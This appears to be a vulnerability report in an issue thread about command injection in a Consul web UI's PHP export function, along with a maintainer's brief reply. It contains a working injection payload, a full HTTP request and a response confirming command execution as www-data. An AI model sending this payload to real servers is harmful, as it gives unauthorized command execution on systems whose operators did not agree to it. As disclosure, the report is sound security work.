I identified the possibility of injecting commands when calling the EXPORT method due to the bulkExportFn function using the shell_exec call concatenating the value of $consul without any sanitization. Therefore, by using the echo command to return JSON in the format expected by the function, it is possible to obtain the result of executing the command.
Hi Elliann i will fix that, but it will take time since i have shifted from this long time ago. feel free to open a pull request if you can/would fix it sooner.
I identified the possibility of injecting commands when calling the EXPORT method due to the bulkExportFn function using the shell_exec call concatenating the value of $consul without any sanitization. Therefore, by using the echo command to return JSON in the format expected by the function, it is possible to obtain the result of executing the command.
Endpoint: /backend/requests.php Payload: consul=;x=
id | base64 -w0
; echo "[{\"LockIndex\":0,\"key\":\"Test\",\"Flags\":0,\"value\":\"$x\",\"CreateIndex\":10522112,\"ModifyIndex\":10522112}]" #&method=EXPORT&path=%5B%22Test%22%5D-- Full request -- POST /backend/requests.php HTTP/1.1 Host: {IP} User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 189 Connection: close Cookie: PHPSESSID={TOKEN}
consul=;x=
id | base64 -w0
; echo "[{\"LockIndex\":0,\"key\":\"Test\",\"Flags\":0,\"value\":\"$x\",\"CreateIndex\":10522112,\"ModifyIndex\":10522112}]" #&method=EXPORT&path=%5B%22Test%22%5D-- Response -- HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Length: 65 Connection: close Content-Type: text/html; charset=UTF-8
{"Test":"uid=33(www-data) gid=33(www-data) groups=33(www-data)\n"}